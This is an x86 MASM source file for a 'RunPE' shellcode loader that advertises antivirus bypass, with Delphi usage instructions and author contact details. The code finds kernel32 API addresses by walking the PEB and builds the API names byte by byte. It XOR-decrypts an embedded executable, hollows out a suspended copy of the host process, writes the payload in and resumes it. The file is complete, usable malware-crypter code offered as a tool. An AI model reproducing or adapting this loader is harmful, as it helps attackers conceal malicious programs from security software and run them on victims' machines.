.386
.model flat,stdcall
 
Comment *
 
[ RunPE ShellCode Bypass AV ] - {Private}
 
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
 
[ 2010 - 2011 ]
 
[Skype : coldzer01 ] - [Yahoo : web.ghost@yahoo.com ]
 
[ Home : www.at4re.com  - www.mtcoders.com ]
 
{
Usage : [Delphi]
 
Make Var with
 
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
 
#### then in code call it like this #########
 
 Begin
        RunPE := @ShellCode[1];
        RunPE(@TextFile[1],length(TextFile));
 end;
 
}
*
 
.code
 
start:
  PUSH EBP
  MOV EBP,ESP
  ADD ESP,-0378h
  PUSH EBX
  PUSH ESI
  PUSH EDI
 
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
 
;################# Extract Module Name [UNICODE] ####################  
  TEST EAX,EAX
AG:  
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,00h
  JE OK
  INC EAX
  INC EAX
  JMP AG
OK:  
  DEC EAX
  DEC EAX
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,5Ch ; '\'
  JE OK2
  JMP OK
OK2:  
  INC EAX
  INC EAX  
;################# Extract Module Name ####################  


;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h                                     
JS CHK  
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase #################### 


;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh                                      ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h                                     ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh                                     ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]      
CMP ECX,4Ch                                     ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h                                     ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h                                     ; 2
JNZ AV
;********* Normal Mode *******
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+18h]
  JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
  MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
  MOV EAX,DWORD PTR DS:[EAX+18h]  
;################# Check Module Name ######################
GO:      
  MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
  MOV BYTE PTR SS:[EBP-28h],47h
  MOV BYTE PTR SS:[EBP-27h],50h
  MOV BYTE PTR SS:[EBP-26h],41h
  XOR EAX,EAX
  MOV DWORD PTR SS:[EBP-14h],EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOV EDX,DWORD PTR DS:[EAX+78h]
  MOV DWORD PTR SS:[EBP-44h],EDX
  MOV EDX,DWORD PTR DS:[EAX+7Ch]
  MOV DWORD PTR SS:[EBP-40h],EDX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  ADD EAX,DWORD PTR SS:[EBP-44h]
  MOV ESI,DWORD PTR DS:[EAX+18h]
  DEC ESI
  TEST ESI,ESI
  JB LoadAPI
  INC ESI
  XOR EDX,EDX
LoopAPI:
  MOV ECX,DWORD PTR DS:[EAX+20h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  SHL EBX,2h
  ADD ECX,EBX
  MOV EDI,DWORD PTR DS:[ECX+0Ch]
  ADD EDI,DWORD PTR SS:[EBP-4h]
  MOV BL,BYTE PTR DS:[EDI]
  CMP BL,BYTE PTR SS:[EBP-28h]
  JNZ CheckAPI
  MOV BL,BYTE PTR DS:[EDI+3h]
  CMP BL,BYTE PTR SS:[EBP-27h]
  JNZ CheckAPI
  MOV CL,BYTE PTR DS:[EDI+7h]
  CMP CL,BYTE PTR SS:[EBP-26h]
  JNZ CheckAPI
  MOV ECX,DWORD PTR DS:[EAX+24h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  ADD EBX,EBX
  ADD ECX,EBX
  MOV CX,WORD PTR DS:[ECX]
  ADD CX,3h
  MOV EAX,DWORD PTR DS:[EAX+1Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOVZX ECX,CX
  SHL ECX,2h
  ADD EAX,ECX
  MOV ESI,DWORD PTR DS:[EAX]
  ADD ESI,DWORD PTR SS:[EBP-4h]
  MOV DWORD PTR SS:[EBP-14h],ESI
  JMP LoadAPI
CheckAPI:
  INC EDX
  DEC ESI
  JNZ LoopAPI
LoadAPI:                                                ; [ Write API To An Pointer - use later ]
  MOV BYTE PTR SS:[EBP-69h],47h  
  MOV BYTE PTR SS:[EBP-68h],65h
  MOV BYTE PTR SS:[EBP-67h],74h
  MOV BYTE PTR SS:[EBP-66h],4Dh
  MOV BYTE PTR SS:[EBP-65h],6Fh
  MOV BYTE PTR SS:[EBP-64h],64h
  MOV BYTE PTR SS:[EBP-63h],75h
  MOV BYTE PTR SS:[EBP-62h],6Ch
  MOV BYTE PTR SS:[EBP-61h],65h
  MOV BYTE PTR SS:[EBP-60h],48h
  MOV BYTE PTR SS:[EBP-5Fh],61h
  MOV BYTE PTR SS:[EBP-5Eh],6Eh
  MOV BYTE PTR SS:[EBP-5Dh],64h
  MOV BYTE PTR SS:[EBP-5Ch],6Ch
  MOV BYTE PTR SS:[EBP-5Bh],65h
  MOV BYTE PTR SS:[EBP-5Ah],41h
  MOV BYTE PTR SS:[EBP-59h],0h
  MOV BYTE PTR SS:[EBP-7Ch],47h
  MOV BYTE PTR SS:[EBP-7Bh],65h
  MOV BYTE PTR SS:[EBP-7Ah],74h
  MOV BYTE PTR SS:[EBP-79h],4Dh
  MOV BYTE PTR SS:[EBP-78h],6Fh
  MOV BYTE PTR SS:[EBP-77h],64h
  MOV BYTE PTR SS:[EBP-76h],75h
  MOV BYTE PTR SS:[EBP-75h],6Ch
  MOV BYTE PTR SS:[EBP-74h],65h
  MOV BYTE PTR SS:[EBP-73h],46h
  MOV BYTE PTR SS:[EBP-72h],69h
  MOV BYTE PTR SS:[EBP-71h],6Ch
  MOV BYTE PTR SS:[EBP-70h],65h
  MOV BYTE PTR SS:[EBP-6Fh],4Eh
  MOV BYTE PTR SS:[EBP-6Eh],61h
  MOV BYTE PTR SS:[EBP-6Dh],6Dh
  MOV BYTE PTR SS:[EBP-6Ch],65h
  MOV BYTE PTR SS:[EBP-6Bh],41h
  MOV BYTE PTR SS:[EBP-6Ah],0h
  MOV BYTE PTR SS:[EBP-91h],5Ah
  MOV BYTE PTR SS:[EBP-90h],77h
  MOV BYTE PTR SS:[EBP-8Fh],55h
  MOV BYTE PTR SS:[EBP-8Eh],6Eh
  MOV BYTE PTR SS:[EBP-8Dh],6Dh
  MOV BYTE PTR SS:[EBP-8Ch],61h
  MOV BYTE PTR SS:[EBP-8Bh],70h
  MOV BYTE PTR SS:[EBP-8Ah],56h
  MOV BYTE PTR SS:[EBP-89h],69h
  MOV BYTE PTR SS:[EBP-88h],65h
  MOV BYTE PTR SS:[EBP-87h],77h
  MOV BYTE PTR SS:[EBP-86h],4Fh
  MOV BYTE PTR SS:[EBP-85h],66h
  MOV BYTE PTR SS:[EBP-84h],53h
  MOV BYTE PTR SS:[EBP-83h],65h
  MOV BYTE PTR SS:[EBP-82h],63h
  MOV BYTE PTR SS:[EBP-81h],74h
  MOV BYTE PTR SS:[EBP-80h],69h
  MOV BYTE PTR SS:[EBP-7Fh],6Fh
  MOV BYTE PTR SS:[EBP-7Eh],6Eh
  MOV BYTE PTR SS:[EBP-7Dh],0h
  MOV BYTE PTR SS:[EBP-0A0h],56h
  MOV BYTE PTR SS:[EBP-9Fh],69h
  MOV BYTE PTR SS:[EBP-9Eh],72h
  MOV BYTE PTR SS:[EBP-9Dh],74h
  MOV BYTE PTR SS:[EBP-9Ch],75h
  MOV BYTE PTR SS:[EBP-9Bh],61h
  MOV BYTE PTR SS:[EBP-9Ah],6Ch
  MOV BYTE PTR SS:[EBP-99h],41h
  MOV BYTE PTR SS:[EBP-98h],6Ch
  MOV BYTE PTR SS:[EBP-97h],6Ch
  MOV BYTE PTR SS:[EBP-96h],6Fh
  MOV BYTE PTR SS:[EBP-95h],63h
  MOV BYTE PTR SS:[EBP-94h],45h
  MOV BYTE PTR SS:[EBP-93h],78h
  MOV BYTE PTR SS:[EBP-92h],0h
  MOV BYTE PTR SS:[EBP-0B1h],56h
  MOV BYTE PTR SS:[EBP-0B0h],69h
  MOV BYTE PTR SS:[EBP-0AFh],72h
  MOV BYTE PTR SS:[EBP-0AEh],74h
  MOV BYTE PTR SS:[EBP-0ADh],75h
  MOV BYTE PTR SS:[EBP-0ACh],61h
  MOV BYTE PTR SS:[EBP-0ABh],6Ch
  MOV BYTE PTR SS:[EBP-0AAh],50h
  MOV BYTE PTR SS:[EBP-0A9h],72h
  MOV BYTE PTR SS:[EBP-0A8h],6Fh
  MOV BYTE PTR SS:[EBP-0A7h],74h
  MOV BYTE PTR SS:[EBP-0A6h],65h
  MOV BYTE PTR SS:[EBP-0A5h],63h
  MOV BYTE PTR SS:[EBP-0A4h],74h
  MOV BYTE PTR SS:[EBP-0A3h],45h
  MOV BYTE PTR SS:[EBP-0A2h],78h
  MOV BYTE PTR SS:[EBP-0A1h],0h
  MOV BYTE PTR SS:[EBP-0C3h],52h
  MOV BYTE PTR SS:[EBP-0C2h],65h
  MOV BYTE PTR SS:[EBP-0C1h],61h
  MOV BYTE PTR SS:[EBP-0C0h],64h
  MOV BYTE PTR SS:[EBP-0BFh],50h
  MOV BYTE PTR SS:[EBP-0BEh],72h
  MOV BYTE PTR SS:[EBP-0BDh],6Fh
  MOV BYTE PTR SS:[EBP-0BCh],63h
  MOV BYTE PTR SS:[EBP-0BBh],65h
  MOV BYTE PTR SS:[EBP-0BAh],73h
  MOV BYTE PTR SS:[EBP-0B9h],73h
  MOV BYTE PTR SS:[EBP-0B8h],4Dh
  MOV BYTE PTR SS:[EBP-0B7h],65h
  MOV BYTE PTR SS:[EBP-0B6h],6Dh
  MOV BYTE PTR SS:[EBP-0B5h],6Fh
  MOV BYTE PTR SS:[EBP-0B4h],72h
  MOV BYTE PTR SS:[EBP-0B3h],79h
  MOV BYTE PTR SS:[EBP-0B2h],0h
  MOV BYTE PTR SS:[EBP-0D6h],57h
  MOV BYTE PTR SS:[EBP-0D5h],72h
  MOV BYTE PTR SS:[EBP-0D4h],69h
  MOV BYTE PTR SS:[EBP-0D3h],74h
  MOV BYTE PTR SS:[EBP-0D2h],65h
  MOV BYTE PTR SS:[EBP-0D1h],50h
  MOV BYTE PTR SS:[EBP-0D0h],72h
  MOV BYTE PTR SS:[EBP-0CFh],6Fh
  MOV BYTE PTR SS:[EBP-0CEh],63h
  MOV BYTE PTR SS:[EBP-0CDh],65h
  MOV BYTE PTR SS:[EBP-0CCh],73h
  MOV BYTE PTR SS:[EBP-0CBh],73h
  MOV BYTE PTR SS:[EBP-0CAh],4Dh
  MOV BYTE PTR SS:[EBP-0C9h],65h
  MOV BYTE PTR SS:[EBP-0C8h],6Dh
  MOV BYTE PTR SS:[EBP-0C7h],6Fh
  MOV BYTE PTR SS:[EBP-0C6h],72h
  MOV BYTE PTR SS:[EBP-0C5h],79h
  MOV BYTE PTR SS:[EBP-0C4h],0h
  MOV BYTE PTR SS:[EBP-0E7h],47h
  MOV BYTE PTR SS:[EBP-0E6h],65h
  MOV BYTE PTR SS:[EBP-0E5h],74h
  MOV BYTE PTR SS:[EBP-0E4h],54h
  MOV BYTE PTR SS:[EBP-0E3h],68h
  MOV BYTE PTR SS:[EBP-0E2h],72h
  MOV BYTE PTR SS:[EBP-0E1h],65h
  MOV BYTE PTR SS:[EBP-0E0h],61h
  MOV BYTE PTR SS:[EBP-0DFh],64h
  MOV BYTE PTR SS:[EBP-0DEh],43h
  MOV BYTE PTR SS:[EBP-0DDh],6Fh
  MOV BYTE PTR SS:[EBP-0DCh],6Eh
  MOV BYTE PTR SS:[EBP-0DBh],74h
  MOV BYTE PTR SS:[EBP-0DAh],65h
  MOV BYTE PTR SS:[EBP-0D9h],78h
  MOV BYTE PTR SS:[EBP-0D8h],74h
  MOV BYTE PTR SS:[EBP-0D7h],0h
  MOV BYTE PTR SS:[EBP-0F8h],53h
  MOV BYTE PTR SS:[EBP-0F7h],65h
  MOV BYTE PTR SS:[EBP-0F6h],74h
  MOV BYTE PTR SS:[EBP-0F5h],54h
  MOV BYTE PTR SS:[EBP-0F4h],68h
  MOV BYTE PTR SS:[EBP-0F3h],72h
  MOV BYTE PTR SS:[EBP-0F2h],65h
  MOV BYTE PTR SS:[EBP-0F1h],61h
  MOV BYTE PTR SS:[EBP-0F0h],64h
  MOV BYTE PTR SS:[EBP-0EFh],43h
  MOV BYTE PTR SS:[EBP-0EEh],6Fh
  MOV BYTE PTR SS:[EBP-0EDh],6Eh
  MOV BYTE PTR SS:[EBP-0ECh],74h
  MOV BYTE PTR SS:[EBP-0EBh],65h
  MOV BYTE PTR SS:[EBP-0EAh],78h
  MOV BYTE PTR SS:[EBP-0E9h],74h
  MOV BYTE PTR SS:[EBP-0E8h],0h
  MOV BYTE PTR SS:[EBP-0105h],52h
  MOV BYTE PTR SS:[EBP-0104h],65h
  MOV BYTE PTR SS:[EBP-0103h],73h
  MOV BYTE PTR SS:[EBP-0102h],75h
  MOV BYTE PTR SS:[EBP-0101h],6Dh
  MOV BYTE PTR SS:[EBP-0100h],65h
  MOV BYTE PTR SS:[EBP-0FFh],54h
  MOV BYTE PTR SS:[EBP-0FEh],68h
  MOV BYTE PTR SS:[EBP-0FDh],72h
  MOV BYTE PTR SS:[EBP-0FCh],65h
  MOV BYTE PTR SS:[EBP-0FBh],61h
  MOV BYTE PTR SS:[EBP-0FAh],64h
  MOV BYTE PTR SS:[EBP-0F9h],0h
  MOV BYTE PTR SS:[EBP-01Eh],6Eh
  MOV BYTE PTR SS:[EBP-01Dh],74h
  MOV BYTE PTR SS:[EBP-01Ch],64h
  MOV BYTE PTR SS:[EBP-01Bh],6Ch
  MOV BYTE PTR SS:[EBP-01Ah],6Ch
  MOV BYTE PTR SS:[EBP-019h],0h
  MOV BYTE PTR SS:[EBP-0114h],43h
  MOV BYTE PTR SS:[EBP-0113h],72h
  MOV BYTE PTR SS:[EBP-0112h],65h
  MOV BYTE PTR SS:[EBP-0111h],61h
  MOV BYTE PTR SS:[EBP-0110h],74h
  MOV BYTE PTR SS:[EBP-010Fh],65h
  MOV BYTE PTR SS:[EBP-010Eh],50h
  MOV BYTE PTR SS:[EBP-010Dh],72h
  MOV BYTE PTR SS:[EBP-010Ch],6Fh
  MOV BYTE PTR SS:[EBP-010Bh],63h
  MOV BYTE PTR SS:[EBP-010Ah],65h
  MOV BYTE PTR SS:[EBP-109h],73h
  MOV BYTE PTR SS:[EBP-108h],73h
  MOV BYTE PTR SS:[EBP-107h],41h
  MOV BYTE PTR SS:[EBP-0106h],0h
  MOV BYTE PTR SS:[EBP-121h],4Ch
  MOV BYTE PTR SS:[EBP-120h],6Fh
  MOV BYTE PTR SS:[EBP-11Fh],61h
  MOV BYTE PTR SS:[EBP-11Eh],64h
  MOV BYTE PTR SS:[EBP-11Dh],4Ch
  MOV BYTE PTR SS:[EBP-11Ch],69h
  MOV BYTE PTR SS:[EBP-11Bh],62h
  MOV BYTE PTR SS:[EBP-11Ah],72h
  MOV BYTE PTR SS:[EBP-119h],61h
  MOV BYTE PTR SS:[EBP-118h],72h
  MOV BYTE PTR SS:[EBP-117h],79h
  MOV BYTE PTR SS:[EBP-116h],41h
  MOV BYTE PTR SS:[EBP-115h],0h
  LEA EAX,DWORD PTR SS:[EBP-121h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-18h],EAX
  MOV ESI,DWORD PTR SS:[EBP+0Ch]
  DEC ESI
  TEST ESI,ESI
  JL CheckLen
  INC ESI
  XOR EBX,EBX
DeCryptPE:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV AL,BYTE PTR DS:[EAX+EBX]
  XOR AL,2Ah                                            ; XOR Key 1       [ You Can Change It But Should Crypt the File with the New Keys ]
  XOR AL,87h                                            ; XOR Key 2
  MOV EDX,DWORD PTR SS:[EBP+8h]
  MOV BYTE PTR DS:[EDX+EBX],AL
  INC EBX
  DEC ESI
  JNZ DeCryptPE
CheckLen:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV DWORD PTR SS:[EBP-54h],EAX
  LEA EAX,DWORD PTR SS:[EBP-69h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-7Ch]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV ESI,EAX
  PUSH 105
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0h
  CALL EBX
  PUSH EAX
  CALL ESI
  LEA EAX,DWORD PTR SS:[EBP-184h]
  MOV EBX,43h
GetS4C:
  MOV BYTE PTR DS:[EAX+EBX],0h
  DEC EBX
  CMP EBX,-1h
  JNZ GetS4C
  MOV DWORD PTR SS:[EBP-184h],44h
  LEA EAX,DWORD PTR SS:[EBP-114h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-184h]
  PUSH EAX
  PUSH 0h
  PUSH 0h
  PUSH 4h
  PUSH 0h
  PUSH 0h
  PUSH 0h
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0E7h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV DWORD PTR SS:[EBP-250h],10007h
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0C3h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-30h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-91h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-1Eh]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-18h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  MOV DWORD PTR SS:[EBP-2Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-0A0h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  PUSH 40h
  PUSH 3000h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+50h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV DWORD PTR SS:[EBP-38h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0D6h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-0Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  LEA EDI,DWORD PTR DS:[EAX+18h]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX EAX,WORD PTR DS:[EAX+14h]
  ADD EDI,EAX
  LEA EAX,DWORD PTR SS:[EBP-0B1h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-8h],EAX
  MOV DWORD PTR SS:[EBP-270h],1h
  MOV DWORD PTR SS:[EBP-26Ch],10h
  MOV DWORD PTR SS:[EBP-268h],2h
  MOV DWORD PTR SS:[EBP-264h],20h
  MOV DWORD PTR SS:[EBP-260h],4h
  MOV DWORD PTR SS:[EBP-25Ch],40h
  MOV DWORD PTR SS:[EBP-258h],4h
  MOV DWORD PTR SS:[EBP-254h],40h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX ESI,WORD PTR DS:[EAX+6h]
  DEC ESI
  TEST ESI,ESI
  JL CheckReadP
  INC ESI
  XOR EBX,EBX
ReadRPLoop:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  LEA EAX,DWORD PTR SS:[EBP-3Ch]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
  SHR EAX,1Dh
  MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-8h]
  INC EBX
  DEC ESI
  JNZ ReadRPLoop
CheckReadP:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+28h]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  MOV DWORD PTR SS:[EBP-1A0h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0F8h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-105h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  POP EDI
  POP ESI
  POP EBX
  MOV ESP,EBP
  POP EBP
  RETN 8h
end start
